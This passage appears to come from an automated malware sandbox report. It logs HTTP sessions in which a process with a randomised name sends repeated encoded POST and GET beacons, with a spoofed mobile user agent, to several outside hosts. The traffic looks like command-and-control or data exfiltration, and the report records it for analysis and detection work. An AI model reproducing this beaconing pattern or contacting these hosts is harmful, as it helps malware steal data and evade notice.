                              Cache-Control: no-cache
                              Origin: http://www.mediaplug.biz
                              Referer: http://www.mediaplug.biz/osde/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 73 72 49 58 4a 63 53 63 6b 68 56 48 75 4f 74 6e 34 44 77 38 33 36 4f 79 4a 38 70 5a 6e 39 65 57 7a 70 54 2f 65 35 41 39 78 6e 46 30 50 56 66 56 51 47 62 39 45 45 6c 49 50 66 6c 5a 5a 48 68 63 7a 34 4c 4c 35 63 70 62 49 47 47 63 45 69 6a 37 6b 41 46 46 52 49 55 32 76 43 33 48 77 6b 42 43 6d 38 72 6d 34 48 76 47 37 4e 2f 51 30 61 4d 68 67 38 62 30 72 6b 58 63 66 41 43 41 78 6c 61 4d 72 32 64 63 7a 54 5a 4b 37 72 46 47 64 6c 38 4f 51 35 66 6a 50 56 61 61 72 35 4b 4f 65 57 4a 2f 41 36 76 6f 56 62 57 38 66 73 6a 51 4c 42 32 2f 64 30 56 61 4b 51 3d 3d
                              Data Ascii: yXf=cUZt2z1pvMaysrIXJcSckhVHuOtn4Dw836OyJ8pZn9eWzpT/e5A9xnF0PVfVQGb9EElIPflZZHhcz4LL5cpbIGGcEij7kAFFRIU2vC3HwkBCm8rm4HvG7N/Q0aMhg8b0rkXcfACAxlaMr2dczTZK7rFGdl8OQ5fjPVaar5KOeWJ/A6voVbW8fsjQLB2/d0VaKQ==
                              Sep 11, 2024 14:25:53.594269991 CEST727INHTTP/1.1 405 Not Allowed
                              Server: nginx/1.14.2
                              Date: Wed, 11 Sep 2024 12:25:53 GMT
                              Content-Type: text/html
                              Content-Length: 575
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.114971666.81.203.10804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:25:55.558121920 CEST796OUTPOST /osde/ HTTP/1.1
                              Host: www.mediaplug.biz
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 220
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.mediaplug.biz
                              Referer: http://www.mediaplug.biz/osde/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 32 57 7a 4d 76 2f 4d 6f 41 39 79 6e 46 30 58 6c 66 55 50 57 62 32 45 45 6f 31 50 65 5a 5a 5a 48 64 63 7a 38 50 4c 34 76 42 45 49 57 47 53 49 43 6a 35 71 67 46 46 52 49 55 32 76 42 4b 69 77 6b 5a 43 6d 76 7a 6d 71 54 37 42 6c 64 2f 52 38 36 4d 68 6b 38 62 4b 72 6b 57 78 66 43 32 2b 78 6e 79 4d 72 79 52 63 77 43 5a 4a 67 37 46 49 54 46 38 51 63 38 36 63 57 46 7a 42 6b 4b 6d 45 65 6d 63 63 4d 63 2b 79 46 34 66 72 63 2f 72 53 66 6e 58 50 55 46 77 54 52 64 79 51 53 4a 56 5a 33 35 54 2b 74 2f 58 68 5a 50 37 2b 64 65 34 3d
                              Data Ascii: yXf=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL2WzMv/MoA9ynF0XlfUPWb2EEo1PeZZZHdcz8PL4vBEIWGSICj5qgFFRIU2vBKiwkZCmvzmqT7Bld/R86Mhk8bKrkWxfC2+xnyMryRcwCZJg7FITF8Qc86cWFzBkKmEemccMc+yF4frc/rSfnXPUFwTRdyQSJVZ35T+t/XhZP7+de4=
                              Sep 11, 2024 14:25:56.138808012 CEST727INHTTP/1.1 405 Not Allowed
                              Server: nginx/1.14.2
                              Date: Wed, 11 Sep 2024 12:25:56 GMT
                              Content-Type: text/html
                              Content-Length: 575
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.114971766.81.203.10804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:25:58.105159044 CEST1809OUTPOST /osde/ HTTP/1.1
                              Host: www.mediaplug.biz
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 1232
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.mediaplug.biz
                              Referer: http://www.mediaplug.biz/osde/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 2b 57 7a 36 37 2f 65 66 38 39 7a 6e 46 30 61 46 66 4a 50 57 62 72 45 48 59 78 50 65 55 73 5a 42 5a 63 68 4a 62 4c 78 2b 42 45 47 57 47 53 47 53 6a 34 6b 41 46 71 52 49 45 79 76 43 79 69 77 6b 5a 43 6d 74 48 6d 36 33 76 42 6e 64 2f 51 30 61 4d 74 67 38 61 6e 72 6b 4f 50 66 43 6a 4c 77 58 53 4d 71 57 39 63 32 77 78 4a 73 37 46 64 55 46 39 44 63 38 2b 39 57 46 2f 4e 6b 4c 53 2b 65 6b 4d 63 63 61 48 4e 42 4b 50 6e 48 65 48 42 64 46 72 78 51 56 34 72 4a 75 43 45 62 4a 39 79 33 70 53 6f 6c 76 71 72 42 4e 6a 76 4c 4a 6c 50 65 33 4c 32 56 63 5a 6b 4a 4c 61 59 64 34 32 39 65 44 7a 79 74 44 77 34 67 39 34 73 66 70 48 36 64 63 77 39 36 53 5a 74 37 55 71 4c 48 49 2b 43 57 6c 67 58 33 45 4b 50 5a 72 76 67 43 76 32 39 4f 54 4a 72 4c 57 58 4d 66 46 38 4d 66 65 50 51 48 6b 50 6e 6c 49 49 38 72 69 72 44 41 54 4e 66 30 4b 57 45 49 6d 39 6a 4d 4d 43 54 61 56 5a 39 66 74 78 53 4c 63 [TRUNCATED]
                              Data Ascii: yXf=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL+Wz67/ef89znF0aFfJPWbrEHYxPeUsZBZchJbLx+BEGWGSGSj4kAFqRIEyvCyiwkZCmtHm63vBnd/Q0aMtg8anrkOPfCjLwXSMqW9c2wxJs7FdUF9Dc8+9WF/NkLS+ekMccaHNBKPnHeHBdFrxQV4rJuCEbJ9y3pSolvqrBNjvLJlPe3L2VcZkJLaYd429eDzytDw4g94sfpH6dcw96SZt7UqLHI+CWlgX3EKPZrvgCv29OTJrLWXMfF8MfePQHkPnlII8rirDATNf0KWEIm9jMMCTaVZ9ftxSLcr/PA+SyNPMdxXcyOWIWkl0LMTywG70qE4p8S297URBHk7zAb0IuDuDHGknf2yMyxc8ycB09e9PGgmUWAFmBiENJ8N6DaVE7uSYeh4MxgGRA86b8qGEzh7EYe7/f6WwHbJCnTHTKZ7nHx+l/EIJUrvhI1IYFfDyYzM/EWuJ5nekru4zArFdb/v5r+Ifg3T35tAW6OLYMb5B1j64Ms3J3lHXxjU//8plNIcxCwTPf8F/TIXnpHxQUjBKUOGjQvmYQe78DZD6Y6LwwfROhJtgPxIN5Sb8x9/giFeOJbjIPMY8mEJo17JRqgt9+JCLTC02epyioPo+bTxv2CpypqlbLHiuzoUTR+Gk9lfjkgEQVWiToBnU3VkdvtxzdKB0e7JxaENMZ0bvaPCpSobcKfLI1GTtOZTuJnlobAARx0JzYBs2wIqkeknPDqOrbZj6TA4NT88fMQHikeqCjjJHzbkxRsOAlO6JDjiSBqHXP7kvfRcnydDej3goUtTkC62xhIjdR5vXa7gfgCxnwNWC/FDJmn8a8GUudPAjGNmodzTeFhyq4wbmIKhZBJv43uqTIJIGGG5pyykPB30SphwpdHCS/df9/vJp/V8c3oozo+ZD34VLn2inYdpD9ze++tmtz942ehfOpZRhVCj+qtyiDSTy1+olghulqgTIRUKc [TRUNCATED]
                              Sep 11, 2024 14:25:58.679058075 CEST727INHTTP/1.1 405 Not Allowed
                              Server: nginx/1.14.2
                              Date: Wed, 11 Sep 2024 12:25:58 GMT
                              Content-Type: text/html
                              Content-Length: 575
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.114971866.81.203.10804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:26:00.652930975 CEST508OUTGET /osde/?yXf=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sZHqZF0jtyzh4SZws5yKjtHhCwOPV3WXnk7o=&ndk=ctppWTth- HTTP/1.1
                              Host: www.mediaplug.biz
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-US
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Sep 11, 2024 14:26:01.474500895 CEST1236INHTTP/1.1 200 OK
                              Server: nginx/1.14.2
                              Date: Wed, 11 Sep 2024 12:26:01 GMT
                              Content-Type: text/html
                              Content-Length: 1432
                              Last-Modified: Tue, 14 May 2024 12:20:23 GMT
                              Connection: close
                              ETag: "66435707-598"
                              Accept-Ranges: bytes
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 23 70 61 72 74 6e 65 72 2c 0d 0a 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0d [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height: 100%; width: 100%; margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent; } /*body { overflow:hidden; }*/ </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div style="text-align: center;"> <p>This domain is pending renewal or has expired. Please contact the domain provider with questions.</p></div> <div id="partner"></div> <script type="text/j
                              Sep 11, 2024 14:26:01.474853039 CEST430INData Raw: 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61
                              Data Ascii: avascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor22' + '/park.js?beforeBodyEndHTML


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.1149719103.42.108.46804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:26:06.846338987 CEST791OUTPOST /yl6y/ HTTP/1.1
                              Host: www.independent200.org
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 200
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.independent200.org
                              Referer: http://www.independent200.org/yl6y/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 34 2b 61 4e 46 42 6d 66 4b 2f 77 73 66 62 72 45 4d 38 41 4a 76 30 70 39 6b 2b 66 65 38 64 6e 33 5a 4e 37 68 54 64 52 43 61 73 31 33 57 4f 43 42 61 42 54 45 64 66 4d 44 65 59 41 4e 48 6e 56 39 76 6f 76 30 4a 70 42 4f 41 79 56 56 54 50 54 38 48 69 55 75 65 56 39 6f 56 32 44 50 51 50 6b 73 70 2b 30 47 44 72 66 63 61 54 56 4b 45 79 58 58 51 56 43 6b 67 77 71 6f 61 66 78 4e 6f 52 78 4c 57 54 6f 61 78 75 63 56 74 41 49 43 63 70 57 68 42 41 69 35 5a 62 35 54 34 65 4a 6f 6d 32 6a 6d 45 69 43 66 52 6a 33 5a 66 43 71 53 33 75 38 39 44 54 76 55 39 41 3d 3d
                              Data Ascii: yXf=dNiLasFHVsc44+aNFBmfK/wsfbrEM8AJv0p9k+fe8dn3ZN7hTdRCas13WOCBaBTEdfMDeYANHnV9vov0JpBOAyVVTPT8HiUueV9oV2DPQPksp+0GDrfcaTVKEyXXQVCkgwqoafxNoRxLWToaxucVtAICcpWhBAi5Zb5T4eJom2jmEiCfRj3ZfCqS3u89DTvU9A==
                              Sep 11, 2024 14:26:07.700239897 CEST154INHTTP/1.1 403 Forbidden
                              Content-Type: text/plain; charset=utf-8
                              Date: Wed, 11 Sep 2024 12:26:07 GMT
                              Content-Length: 11
                              Connection: close
                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                              Data Ascii: Bad Request


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.1149720103.42.108.46804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:26:09.386543989 CEST811OUTPOST /yl6y/ HTTP/1.1
                              Host: www.independent200.org
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 220
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.independent200.org
                              Referer: http://www.independent200.org/yl6y/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 7a 33 5a 6f 2f 68 53 63 52 43 64 73 31 33 5a 75 44 4c 45 78 53 70 64 65 77 68 65 5a 4d 4e 48 6e 42 39 76 71 6e 30 4a 65 39 42 53 53 56 54 50 50 54 2b 59 79 55 75 65 56 39 6f 56 32 58 6c 51 50 73 73 70 4f 6b 47 43 50 72 44 5a 54 56 4a 54 43 58 58 62 31 43 67 67 77 72 39 61 65 39 6e 6f 53 4a 4c 57 53 30 61 78 36 49 4b 32 77 49 45 53 4a 58 4e 41 6a 62 69 63 62 38 64 77 2f 68 44 6c 54 48 36 4d 45 54 46 42 41 2b 4f 63 52 69 51 6a 49 64 4e 4b 69 4b 64 6d 45 79 59 4e 74 4e 71 2f 35 4d 70 56 33 45 38 76 6e 49 74 49 61 77 3d
                              Data Ascii: yXf=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vz3Zo/hScRCds13ZuDLExSpdewheZMNHnB9vqn0Je9BSSVTPPT+YyUueV9oV2XlQPsspOkGCPrDZTVJTCXXb1Cggwr9ae9noSJLWS0ax6IK2wIESJXNAjbicb8dw/hDlTH6METFBA+OcRiQjIdNKiKdmEyYNtNq/5MpV3E8vnItIaw=
                              Sep 11, 2024 14:26:10.257302046 CEST154INHTTP/1.1 403 Forbidden
                              Content-Type: text/plain; charset=utf-8
                              Date: Wed, 11 Sep 2024 12:26:10 GMT
                              Content-Length: 11
                              Connection: close
                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                              Data Ascii: Bad Request


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.1149721103.42.108.46804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:26:11.942610979 CEST1824OUTPOST /yl6y/ HTTP/1.1
                              Host: www.independent200.org
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 1232
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.independent200.org
                              Referer: http://www.independent200.org/yl6y/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 72 33 59 61 33 68 51 2f 4a 43 63 73 31 33 48 2b 44 49 45 78 53 52 64 66 59 6c 65 5a 51 37 48 68 46 39 75 49 66 30 50 71 70 42 4c 69 56 54 58 50 54 7a 48 69 55 37 65 55 4e 57 56 32 48 6c 51 50 73 73 70 49 67 47 46 62 66 44 56 7a 56 4b 45 79 58 6c 51 56 43 59 67 30 2b 4b 61 65 70 64 6f 69 70 4c 57 32 55 61 2b 70 67 4b 72 41 49 38 56 4a 58 56 41 69 6e 48 63 62 77 6e 77 2f 46 6c 6c 56 33 36 4d 43 57 66 46 6a 4c 54 65 67 4b 50 2f 4c 51 6f 58 54 37 52 67 31 36 62 63 64 74 5a 6a 50 42 36 51 56 78 73 33 58 59 75 5a 66 61 2f 31 78 35 53 45 48 4e 4a 61 4f 46 71 73 4a 57 76 56 61 61 44 2f 52 30 57 70 46 63 4e 48 54 65 63 79 69 6c 4f 30 7a 41 38 32 5a 6d 48 68 6e 62 33 49 2b 6f 57 78 66 74 4d 72 54 4f 41 7a 32 32 66 32 30 7a 45 44 70 35 43 4c 39 74 37 31 53 41 68 4e 35 52 56 36 58 53 50 38 78 71 77 42 36 45 62 63 45 6d 76 4b 6f 48 52 6b 70 46 50 79 55 4d 73 59 32 4c 6f 43 45 [TRUNCATED]
                              Data Ascii: yXf=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vr3Ya3hQ/JCcs13H+DIExSRdfYleZQ7HhF9uIf0PqpBLiVTXPTzHiU7eUNWV2HlQPsspIgGFbfDVzVKEyXlQVCYg0+KaepdoipLW2Ua+pgKrAI8VJXVAinHcbwnw/FllV36MCWfFjLTegKP/LQoXT7Rg16bcdtZjPB6QVxs3XYuZfa/1x5SEHNJaOFqsJWvVaaD/R0WpFcNHTecyilO0zA82ZmHhnb3I+oWxftMrTOAz22f20zEDp5CL9t71SAhN5RV6XSP8xqwB6EbcEmvKoHRkpFPyUMsY2LoCEN/gh7eG/uWHe3BvTj6donP0AeReytR6Dw70RHp37IV8cYwsVPzie2Bhf9kui22sKeZjrbXDSef/OOttUp0TUit+H/Yq74A4eVBmbWbtAS3uSR8Vj6eOW6Tt4JoRYXMk8NqCq9Lcrs3M7vS7tNbWWj1dVyX32jNQ9Z6nrjcz0FP9PCKPAgwaAgZX7/mIcuZ/W67UtGWQJzCSo7X1sgij/8+/72bCTe19nu70W3kwD1ishkC+6M3Yht1UQTupnbF3YB5foMomPCZc5EdjMdH/ihb/yI04+0LFJpWOiwpBcNoEe0ZXKhEfebxoNVEZJtHH8ATu9VK2eswZTYHtfRjyIYWFSDHZd1oRN/bdspGpGHH8VFrlDtE2kb7XoZM5tO7hEb6zoTngRLPQi8FRmzfNGxIN8dSGBRYQVn4zdKlhdxpExfpuXSeFMglvb+aX8KHooR/m/i1xXBiH1baBOzFkBqkAd840fkzeUrwHN2PP8QyTGd0n7CrJlspxH0JzaXL58iCjSLTctaSNCtXUNUnhl6IPRkjRWt/UvAjUeJK83QCF0cOohb9ZC6zSrO3hNSxF2Q5bwwnxUm423DjnPUlZIGcnrd7el+6dnOzH9SOYO7jedl3D57UMwiktKTg1YnoOO